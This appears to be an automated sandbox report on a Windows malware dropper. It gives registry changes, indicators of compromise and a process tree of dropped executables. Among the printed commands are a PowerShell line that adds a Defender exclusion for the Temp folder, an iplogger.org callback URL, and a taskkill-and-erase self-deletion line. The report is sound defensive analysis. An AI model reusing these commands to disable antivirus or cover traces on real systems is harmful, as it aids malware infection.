\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\KVFileExpirationTime = "132897964078643091" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\BkDownloadRatePct = "45" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MonthlyUploadRestriction = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyCdnBytes = "78179838" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MemoryUsageKB = "6412" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\DownloadMode_BackCompat = "1" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\LANConnectionCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownlinkUsageBps = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\SwarmCount = "3" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownlinkUsageBps = "13374948" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyInternetBytes = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CDNConnectionCount = "3" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MemoryUsageKB = "6384" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateBkBps = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\SwarmCount = "2" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyCdnBytes = "5396209" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownlinkBps = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UplinkBps = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MemoryUsageKB = "5504" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyLanBytes = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\InternetConnectionCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\NormalDownloadCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MemoryUsageKB = "4096" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "24.982892" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\NormalDownloadPendingCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\DODownloadMode = "1" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyLinkLocalBytes = "0" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\Geo_EndpointFullUri = "https://geo.prod.do.dsp.mp.microsoft.com/geo" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PeerInfoCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\GroupConnectionCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PriorityDownloadPendingCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyCdnBytes = "0" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\GeoVersion_EndpointFullUri = "https://geover.prod.do.dsp.mp.microsoft.com/geoversion" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PriorityDownloadCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyGroupBytes = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MonthID = "2" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MemoryUsageKB = "4076" svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Settings svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateFrCnt = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\LinkLocalConnectionCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MemoryUsageKB = "4104" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\SwarmCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownlinkUsageBps = "11446294" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "0.128205" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadMonthlyLanBytes = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\FrDownloadRatePct = "90" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "0.000000" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadMonthlyInternetBytes = "0" svchost.exe -
Modifies registry class 1 IoCs
Processes:
620ee9f0f317f_Fri00dfd53221.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings 620ee9f0f317f_Fri00dfd53221.exe -
Runs net.exe
-
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 38 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
620eea0052b41_Fri0064244e526.execacls.exepowershell.execmd.exeM8BDG.exeM8BDG.exeM8BDG.exeE1FA1.exeE1FA1.exeE1FA1.exepid process 2512 620eea0052b41_Fri0064244e526.exe 2512 620eea0052b41_Fri0064244e526.exe 3340 cacls.exe 3340 cacls.exe 1200 powershell.exe 4264 cmd.exe 4264 cmd.exe 4424 M8BDG.exe 4424 M8BDG.exe 2436 4264 cmd.exe 4264 cmd.exe 2436 2436 2436 4480 M8BDG.exe 4480 M8BDG.exe 4488 M8BDG.exe 4488 M8BDG.exe 2436 2436 2436 2436 2436 2436 2436 2436 4616 E1FA1.exe 4616 E1FA1.exe 4564 E1FA1.exe 4564 E1FA1.exe 2436 2436 4544 E1FA1.exe 4544 E1FA1.exe 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 1200 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
dllhostwin.exepid process 2436 5612 dllhostwin.exe -
Suspicious behavior: MapViewOfSection 64 IoCs
Processes:
cacls.exe42ED.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exepid process 3340 cacls.exe 1612 42ED.exe 2436 2436 2436 2436 2436 2436 4708 explorer.exe 4708 explorer.exe 2436 2436 3876 explorer.exe 3876 explorer.exe 2436 2436 1140 explorer.exe 1140 explorer.exe 2436 2436 1248 explorer.exe 1248 explorer.exe 2436 2436 4828 explorer.exe 4828 explorer.exe 4828 explorer.exe 4828 explorer.exe 2436 2436 5800 explorer.exe 5800 explorer.exe 4828 explorer.exe 4828 explorer.exe 5800 explorer.exe 5800 explorer.exe 4828 explorer.exe 4828 explorer.exe 5800 explorer.exe 5800 explorer.exe 4828 explorer.exe 4828 explorer.exe 5800 explorer.exe 5800 explorer.exe 4828 explorer.exe 4828 explorer.exe 5800 explorer.exe 5800 explorer.exe 5800 explorer.exe 5800 explorer.exe 5800 explorer.exe 5800 explorer.exe 5800 explorer.exe 5800 explorer.exe 5800 explorer.exe 5800 explorer.exe 5800 explorer.exe 5800 explorer.exe 5800 explorer.exe 5800 explorer.exe 5800 explorer.exe 5800 explorer.exe 5800 explorer.exe 5800 explorer.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
620ee9bce72ea_Fri00a1d5e5045.exe620ee9bbbbcb5_Fri003a32992dd.exepowershell.exeWerFault.exedescription pid process Token: SeDebugPrivilege 3300 620ee9bce72ea_Fri00a1d5e5045.exe Token: SeDebugPrivilege 1316 620ee9bbbbcb5_Fri003a32992dd.exe Token: SeDebugPrivilege 1200 powershell.exe Token: SeShutdownPrivilege 2436 Token: SeCreatePagefilePrivilege 2436 Token: SeShutdownPrivilege 2436 Token: SeCreatePagefilePrivilege 2436 Token: SeShutdownPrivilege 2436 Token: SeCreatePagefilePrivilege 2436 Token: SeShutdownPrivilege 2436 Token: SeCreatePagefilePrivilege 2436 Token: SeShutdownPrivilege 2436 Token: SeCreatePagefilePrivilege 2436 Token: SeShutdownPrivilege 2436 Token: SeCreatePagefilePrivilege 2436 Token: SeShutdownPrivilege 2436 Token: SeCreatePagefilePrivilege 2436 Token: SeShutdownPrivilege 2436 Token: SeCreatePagefilePrivilege 2436 Token: SeShutdownPrivilege 2436 Token: SeCreatePagefilePrivilege 2436 Token: SeShutdownPrivilege 2436 Token: SeCreatePagefilePrivilege 2436 Token: SeShutdownPrivilege 2436 Token: SeCreatePagefilePrivilege 2436 Token: SeRestorePrivilege 5068 WerFault.exe Token: SeBackupPrivilege 5068 WerFault.exe Token: SeShutdownPrivilege 2436 Token: SeCreatePagefilePrivilege 2436 Token: SeShutdownPrivilege 2436 Token: SeCreatePagefilePrivilege 2436 Token: SeShutdownPrivilege 2436 Token: SeCreatePagefilePrivilege 2436 Token: SeShutdownPrivilege 2436 Token: SeCreatePagefilePrivilege 2436 Token: SeShutdownPrivilege 2436 Token: SeCreatePagefilePrivilege 2436 Token: SeShutdownPrivilege 2436 Token: SeCreatePagefilePrivilege 2436 Token: SeShutdownPrivilege 2436 Token: SeCreatePagefilePrivilege 2436 Token: SeShutdownPrivilege 2436 Token: SeCreatePagefilePrivilege 2436 Token: SeShutdownPrivilege 2436 Token: SeCreatePagefilePrivilege 2436 Token: SeShutdownPrivilege 2436 Token: SeCreatePagefilePrivilege 2436 Token: SeShutdownPrivilege 2436 Token: SeCreatePagefilePrivilege 2436 Token: SeShutdownPrivilege 2436 Token: SeCreatePagefilePrivilege 2436 Token: SeShutdownPrivilege 2436 Token: SeCreatePagefilePrivilege 2436 Token: SeShutdownPrivilege 2436 Token: SeCreatePagefilePrivilege 2436 Token: SeShutdownPrivilege 2436 Token: SeCreatePagefilePrivilege 2436 Token: SeShutdownPrivilege 2436 Token: SeCreatePagefilePrivilege 2436 Token: SeShutdownPrivilege 2436 Token: SeCreatePagefilePrivilege 2436 Token: SeShutdownPrivilege 2436 Token: SeCreatePagefilePrivilege 2436 Token: SeShutdownPrivilege 2436 -
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
620ee9c09b72d_Fri00ef1dae.tmpiexplore.exepid process 4372 620ee9c09b72d_Fri00ef1dae.tmp 2436 2436 5424 iexplore.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
pid process 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 2436 -
Suspicious use of SetWindowsHookEx 11 IoCs
Processes:
620ee9bdae9b2_Fri00129f9288f5.exe620ee9bdae9b2_Fri00129f9288f5.execacls.exeiexplore.exeIEXPLORE.EXEpid process 64 620ee9bdae9b2_Fri00129f9288f5.exe 64 620ee9bdae9b2_Fri00129f9288f5.exe 2092 620ee9bdae9b2_Fri00129f9288f5.exe 2092 620ee9bdae9b2_Fri00129f9288f5.exe 4632 cacls.exe 4632 cacls.exe 5424 iexplore.exe 5424 iexplore.exe 5928 IEXPLORE.EXE 5928 IEXPLORE.EXE 2436 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
win_setup__620eea0b11a3e.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 2404 wrote to memory of 1856 2404 win_setup__620eea0b11a3e.exe setup_installer.exe PID 2404 wrote to memory of 1856 2404 win_setup__620eea0b11a3e.exe setup_installer.exe PID 2404 wrote to memory of 1856 2404 win_setup__620eea0b11a3e.exe setup_installer.exe PID 1856 wrote to memory of 952 1856 setup_installer.exe setup_install.exe PID 1856 wrote to memory of 952 1856 setup_installer.exe setup_install.exe PID 1856 wrote to memory of 952 1856 setup_installer.exe setup_install.exe PID 952 wrote to memory of 3424 952 setup_install.exe cmd.exe PID 952 wrote to memory of 3424 952 setup_install.exe cmd.exe PID 952 wrote to memory of 3424 952 setup_install.exe cmd.exe PID 952 wrote to memory of 1680 952 setup_install.exe cmd.exe PID 952 wrote to memory of 1680 952 setup_install.exe cmd.exe PID 952 wrote to memory of 1680 952 setup_install.exe cmd.exe PID 952 wrote to memory of 3888 952 setup_install.exe cmd.exe PID 952 wrote to memory of 3888 952 setup_install.exe cmd.exe PID 952 wrote to memory of 3888 952 setup_install.exe cmd.exe PID 952 wrote to memory of 1396 952 setup_install.exe cmd.exe PID 952 wrote to memory of 1396 952 setup_install.exe cmd.exe PID 952 wrote to memory of 1396 952 setup_install.exe cmd.exe PID 952 wrote to memory of 2796 952 setup_install.exe cmd.exe PID 952 wrote to memory of 2796 952 setup_install.exe cmd.exe PID 952 wrote to memory of 2796 952 setup_install.exe cmd.exe PID 952 wrote to memory of 2748 952 setup_install.exe cmd.exe PID 952 wrote to memory of 2748 952 setup_install.exe cmd.exe PID 952 wrote to memory of 2748 952 setup_install.exe cmd.exe PID 952 wrote to memory of 1852 952 setup_install.exe cmd.exe PID 952 wrote to memory of 1852 952 setup_install.exe cmd.exe PID 952 wrote to memory of 1852 952 setup_install.exe cmd.exe PID 952 wrote to memory of 1888 952 setup_install.exe cmd.exe PID 952 wrote to memory of 1888 952 setup_install.exe cmd.exe PID 952 wrote to memory of 1888 952 setup_install.exe cmd.exe PID 952 wrote to memory of 3792 952 setup_install.exe cmd.exe PID 952 wrote to memory of 3792 952 setup_install.exe cmd.exe PID 952 wrote to memory of 3792 952 setup_install.exe cmd.exe PID 952 wrote to memory of 3068 952 setup_install.exe cmd.exe PID 952 wrote to memory of 3068 952 setup_install.exe cmd.exe PID 952 wrote to memory of 3068 952 setup_install.exe cmd.exe PID 952 wrote to memory of 3936 952 setup_install.exe cmd.exe PID 952 wrote to memory of 3936 952 setup_install.exe cmd.exe PID 952 wrote to memory of 3936 952 setup_install.exe cmd.exe PID 952 wrote to memory of 384 952 setup_install.exe cmd.exe PID 952 wrote to memory of 384 952 setup_install.exe cmd.exe PID 952 wrote to memory of 384 952 setup_install.exe cmd.exe PID 952 wrote to memory of 1660 952 setup_install.exe cmd.exe PID 952 wrote to memory of 1660 952 setup_install.exe cmd.exe PID 952 wrote to memory of 1660 952 setup_install.exe cmd.exe PID 952 wrote to memory of 3048 952 setup_install.exe cmd.exe PID 952 wrote to memory of 3048 952 setup_install.exe cmd.exe PID 952 wrote to memory of 3048 952 setup_install.exe cmd.exe PID 1396 wrote to memory of 3300 1396 cmd.exe 620ee9bce72ea_Fri00a1d5e5045.exe PID 1396 wrote to memory of 3300 1396 cmd.exe 620ee9bce72ea_Fri00a1d5e5045.exe PID 3792 wrote to memory of 3448 3792 cmd.exe 620ee9f3162da_Fri00b5daea42.exe PID 3792 wrote to memory of 3448 3792 cmd.exe 620ee9f3162da_Fri00b5daea42.exe PID 3792 wrote to memory of 3448 3792 cmd.exe 620ee9f3162da_Fri00b5daea42.exe PID 2748 wrote to memory of 3360 2748 cmd.exe 620ee9c09b72d_Fri00ef1dae.exe PID 2748 wrote to memory of 3360 2748 cmd.exe 620ee9c09b72d_Fri00ef1dae.exe PID 2748 wrote to memory of 3360 2748 cmd.exe 620ee9c09b72d_Fri00ef1dae.exe PID 384 wrote to memory of 1484 384 cmd.exe 620ee9f8079d0_Fri009b6e1f0f0.exe PID 384 wrote to memory of 1484 384 cmd.exe 620ee9f8079d0_Fri009b6e1f0f0.exe PID 384 wrote to memory of 1484 384 cmd.exe 620ee9f8079d0_Fri009b6e1f0f0.exe PID 3936 wrote to memory of 3840 3936 cmd.exe 620ee9f6d521e_Fri005bb939a12f.exe PID 3936 wrote to memory of 3840 3936 cmd.exe 620ee9f6d521e_Fri005bb939a12f.exe PID 3936 wrote to memory of 3840 3936 cmd.exe 620ee9f6d521e_Fri005bb939a12f.exe PID 3424 wrote to memory of 1200 3424 cmd.exe powershell.exe PID 3424 wrote to memory of 1200 3424 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2736 -s 10522⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p1⤵
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup1⤵
-
C:\Users\Admin\AppData\Local\Temp\win_setup__620eea0b11a3e.exe"C:\Users\Admin\AppData\Local\Temp\win_setup__620eea0b11a3e.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0470360D\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS0470360D\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 620ee9bbbbcb5_Fri003a32992dd.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0470360D\620ee9bbbbcb5_Fri003a32992dd.exe620ee9bbbbcb5_Fri003a32992dd.exe5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\a3ffcc91-8a0c-4a12-89a1-6c8faa676d4c.exe"C:\Users\Admin\AppData\Local\Temp\a3ffcc91-8a0c-4a12-89a1-6c8faa676d4c.exe"6⤵
- Executes dropped EXE
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 620eea0052b41_Fri0064244e526.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0470360D\620eea0052b41_Fri0064244e526.exe620eea0052b41_Fri0064244e526.exe5⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\M8BDG.exe"C:\Users\Admin\AppData\Local\Temp\M8BDG.exe"6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\M8BDG.exe"C:\Users\Admin\AppData\Local\Temp\M8BDG.exe"6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\E1FA1L3AHK9IKBB.exehttps://iplogger.org/1ypBa76⤵
-
C:\Users\Admin\AppData\Local\Temp\E1FA1.exe"C:\Users\Admin\AppData\Local\Temp\E1FA1.exe"6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\E1FA1.exe"C:\Users\Admin\AppData\Local\Temp\E1FA1.exe"6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\E1FA1.exe"C:\Users\Admin\AppData\Local\Temp\E1FA1.exe"6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\M8BDG.exe"C:\Users\Admin\AppData\Local\Temp\M8BDG.exe"6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 620ee9f904e5f_Fri008a64a161.exe4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 620ee9f8079d0_Fri009b6e1f0f0.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 620ee9f6d521e_Fri005bb939a12f.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 620ee9f4890f0_Fri00080e80.exe4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 620ee9f3162da_Fri00b5daea42.exe /mixtwo4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 620ee9f0f317f_Fri00dfd53221.exe4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 620ee9c20f6fc_Fri00f49041.exe4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 620ee9c09b72d_Fri00ef1dae.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 620ee9bdae9b2_Fri00129f9288f5.exe4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 620ee9bce72ea_Fri00a1d5e5045.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 620ee9bc939e5_Fri001f6e5e.exe4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\MusNotifyIcon.exe%systemroot%\system32\MusNotifyIcon.exe NotifyTrayIcon 131⤵
- Checks processor information in registry
-
C:\Users\Admin\AppData\Local\Temp\7zS0470360D\620ee9f8079d0_Fri009b6e1f0f0.exe620ee9f8079d0_Fri009b6e1f0f0.exe1⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\6758832152.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\6758832152.exe"C:\Users\Admin\AppData\Local\Temp\6758832152.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\5216484602.exe" hbone2⤵
-
C:\Users\Admin\AppData\Local\Temp\5216484602.exe"C:\Users\Admin\AppData\Local\Temp\5216484602.exe" hbone3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5320 -s 6164⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5320 -s 6524⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5320 -s 6364⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5320 -s 7764⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5320 -s 8924⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\2172678247.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\2172678247.exe"C:\Users\Admin\AppData\Local\Temp\2172678247.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5740 -s 9764⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "620ee9f8079d0_Fri009b6e1f0f0.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS0470360D\620ee9f8079d0_Fri009b6e1f0f0.exe" & exit2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "620ee9f8079d0_Fri009b6e1f0f0.exe" /f3⤵
